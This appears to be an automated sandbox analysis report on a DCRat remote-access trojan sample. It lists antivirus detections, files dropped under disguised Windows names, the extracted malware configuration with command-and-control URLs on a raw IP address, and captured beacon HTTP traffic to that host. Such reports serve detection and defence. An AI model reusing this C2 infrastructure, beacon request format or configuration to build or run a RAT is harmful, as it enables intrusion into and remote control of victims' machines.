Source: http://45.130.42.16/6/api144/9Wp/ |
Avira URL Cloud: Label: malware |
Source: http://45.130.42.16/6/api144/9Wp/ImagevmcpuBigloaddefault.php?MCq8kxznRpE60jYE6i=lG5zicKtIWeAP&wK0sd |
Avira URL Cloud: Label: malware |
Source: http://45.130.42.16/6/api144/9Wp/@0xWdhZWZkRWYvx2ZpJUdwNWb2V2Zh1WS |
Avira URL Cloud: Label: malware |
Source: C:\ProgramData\smartscreen.exe |
Avira: detection malicious, Label: HEUR/AGEN.1323342 |
Source: C:\Windows\IME\IMETC\HELP\UserOOBEBroker.exe |
Avira: detection malicious, Label: HEUR/AGEN.1323342 |
Source: C:\Windows\twain_32\Registry.exe |
Avira: detection malicious, Label: HEUR/AGEN.1323342 |
Source: C:\Windows\Panther\setup.exe\fontdrvhost.exe |
Avira: detection malicious, Label: HEUR/AGEN.1323342 |
Source: C:\Program Files (x86)\Google\Update\RRVGfHJzvQMYfWe.exe |
Avira: detection malicious, Label: HEUR/AGEN.1323342 |
Source: 0000001C.00000002.1751125350.0000000002C41000.00000004.00000800.00020000.00000000.sdmp |
Malware Configuration Extractor: DCRat {"SCRT": "{\"j\":\">\",\"l\":\";\",\"u\":\" \",\"W\":\"@\",\"V\":\".\",\"k\":\"-\",\"O\":\"*\",\"H\":\"#\",\"D\":\"%\",\"5\":\"`\",\"p\":\"~\",\"d\":\")\",\"A\":\",\",\"M\":\"!\",\"8\":\"<\",\"N\":\"&\",\"i\":\"$\",\"I\":\"^\",\"4\":\"|\",\"2\":\"(\",\"w\":\"_\"}", "PCRT": "{\"i\":\"(\",\"I\":\"@\",\"d\":\"_\",\"6\":\"^\",\"0\":\"$\",\"c\":\"!\",\"R\":\"%\",\"9\":\" \",\"j\":\"#\",\"w\":\")\",\"G\":\">\",\"y\":\"-\",\"Y\":\"*\",\"b\":\";\",\"l\":\"`\",\"=\":\".\",\"U\":\"<\",\"n\":\"~\",\"p\":\"|\",\"T\":\"&\",\"S\":\",\"}", "TAG": "", "MUTEX": "DCR_MUTEX-6cV1joJwieGuWPhbIJ4v", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"searchpath": "%UsersFolder% - Fast"}, "AS": false, "ASO": false, "AD": false, "H1": "http://45.130.42.16/6/api144/9Wp/@0xWdhZWZkRWYvx2ZpJUdwNWb2V2Zh1WS", "H2": "http://45.130.42.16/6/api144/9Wp/@0xWdhZWZkRWYvx2ZpJUdwNWb2V2Zh1WS", "T": "0"} |
Source: C:\Program Files (x86)\Google\Update\RRVGfHJzvQMYfWe.exe |
ReversingLabs: Detection: 81% |
Source: C:\Program Files (x86)\Java\RRVGfHJzvQMYfWe.exe |
ReversingLabs: Detection: 81% |
Source: C:\ProgramData\smartscreen.exe |
ReversingLabs: Detection: 81% |
Source: C:\Recovery\RRVGfHJzvQMYfWe.exe |
ReversingLabs: Detection: 81% |
Source: C:\Windows\IME\IMETC\HELP\UserOOBEBroker.exe |
ReversingLabs: Detection: 81% |
Source: C:\Windows\PLA\Templates\RRVGfHJzvQMYfWe.exe |
ReversingLabs: Detection: 81% |
Source: C:\Windows\Panther\setup.exe\fontdrvhost.exe |
ReversingLabs: Detection: 81% |
Source: C:\Windows\twain_32\Registry.exe |
ReversingLabs: Detection: 81% |
Source: 13ZNp2xvRU.exe |
ReversingLabs: Detection: 81% |
Source: C:\ProgramData\smartscreen.exe |
Joe Sandbox ML: detected |
Source: C:\Windows\IME\IMETC\HELP\UserOOBEBroker.exe |
Joe Sandbox ML: detected |
Source: C:\Windows\twain_32\Registry.exe |
Joe Sandbox ML: detected |
Source: C:\Windows\Panther\setup.exe\fontdrvhost.exe |
Joe Sandbox ML: detected |
Source: C:\Program Files (x86)\Google\Update\RRVGfHJzvQMYfWe.exe |
Joe Sandbox ML: detected |
Source: 13ZNp2xvRU.exe |
Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE |
Source: 13ZNp2xvRU.exe |
Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE |
Source: Malware configuration extractor |
URLs: http://45.130.42.16/6/api144/9Wp/@0xWdhZWZkRWYvx2ZpJUdwNWb2V2Zh1WS |
Source: Joe Sandbox View |
ASN Name: BEGET-ASRU BEGET-ASRU |
Source: global traffic |
HTTP traffic detected: GET /6/api144/9Wp/ImagevmcpuBigloaddefault.php?MCq8kxznRpE60jYE6i=lG5zicKtIWeAP&wK0sdAGnXlB32J1ShQkF4bQMIgaE=RxpzDDZhVciR8tTxpjA20z&223505adc80271978c1edbb4eca1c18c=d7a9900f45d34dd9122c7526d5dd4ee1&550e331da9a15a3997b38874465fab05=gNjdzMlNWOwgDOiljZ5kDZ3UjNhZmZjlzMlJmNkBTOkFWM3YjNihDZ&MCq8kxznRpE60jYE6i=lG5zicKtIWeAP&wK0sdAGnXlB32J1ShQkF4bQMIgaE=RxpzDDZhVciR8tTxpjA20z HTTP/1.1Accept: */*Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 45.130.42.16Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /6/api144/9Wp/ImagevmcpuBigloaddefault.php?MCq8kxznRpE60jYE6i=lG5zicKtIWeAP&wK0sdAGnXlB32J1ShQkF4bQMIgaE=RxpzDDZhVciR8tTxpjA20z&223505adc80271978c1edbb4eca1c18c=d7a9900f45d34dd9122c7526d5dd4ee1&550e331da9a15a3997b38874465fab05=gNjdzMlNWOwgDOiljZ5kDZ3UjNhZmZjlzMlJmNkBTOkFWM3YjNihDZ&MCq8kxznRpE60jYE6i=lG5zicKtIWeAP&wK0sdAGnXlB32J1ShQkF4bQMIgaE=RxpzDDZhVciR8tTxpjA20z HTTP/1.1Accept: */*Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 45.130.42.16 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 45.130.42.16 |
Source: global traffic |
HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 23 Apr 2024 20:42:03 GMTContent-Type: text/html; charset=UTF-8Content-Length: 177375Connection: keep-aliveP3P: policyref="/bitrix/p3p.xml", CP="NON DSP COR CUR ADM DEV PSA PSD OUR UNR BUS UNI COM NAV INT DEM STA"X-Powered-CMS: Bitrix Site Manager (3cb6b699f91fcd1677ea8a5f7bcf940b)Set-Cookie: PHPSESSID=0joeWo8FC3UGG5G1KO2ZvI0cw6MJJJdg; path=/; HttpOnlyExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheSet-Cookie: BITRIX_SM_GUEST_ID=2289526; expires=Fri, 18-Apr-2025 20:42:03 GMT; Max-Age=31104000; path=/Set-Cookie: BITRIX_SM_LAST_VISIT=23.04.2024%2023%3A42%3A03; expires=Fri, 18-Apr-2025 20:42:03 GMT; Max-Age=31104000; path=/Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 d0 b6 d0 b5 d0 bd d1 81 d0 ba d0 b0 d1 8f 20 d0 be d0 b4 d0 b5 d0 b6 d0 b4 d0 b0 2c 20 d0 bc d1 83 d0 b6 d1 81 d0 ba d0 b0 d1 8f 20 d0 be d0 b4 d0 b5 d0 b6 d0 b4 d0 b0 2c 20 d1 81 d0 bf d0 be d1 80 d1 82 d0 b8 d0 b2 d0 bd d0 b0 d1 8f 20 d0 be d0 b4 d0 b5 d0 b6 d0 b4 d0 b0 2c 20 d1 82 d0 b0 d0 bf d0 be d1 87 d0 ba d0 b8 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 d0 9c d1 8b 20 d0 bf d1 80 d0 b5 d0 b4 d0 bb d0 b0 d0 b3 d0 b0 d0 b5 d0 bc 20 d1 88 d0 b8 d1 80 d0 be d0 ba d0 b8 d0 b9 20 d0 b0 d1 81 d1 81 d0 be d1 80 d1 82 d0 b8 d0 bc d0 b5 d0 bd d1 82 20 d0 ba d0 b0 d1 87 Data Ascii: <!DOCTYPE html><html lang="ru"><head> <meta name="viewport" content="width=device-width, initial-scale=1.0 |